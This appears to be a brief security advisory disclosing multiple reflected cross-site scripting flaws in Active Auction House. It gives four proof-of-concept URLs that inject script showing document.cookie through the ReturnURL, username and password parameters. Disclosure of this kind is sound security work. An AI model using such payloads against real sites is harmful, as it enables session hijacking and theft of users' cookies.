Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities

Active Auction House ReturnURL Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept URI's are available:
http://www.example.com/activeauctionsuperstore/?ReturnURL='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&username=dcrab&password=
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username=dcrab&password='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/activeauctionsuperstore/?ReturnURL=start.asp&username='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=
http://www.example.com/activeauctionsuperstore/account.asp?ReturnURL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E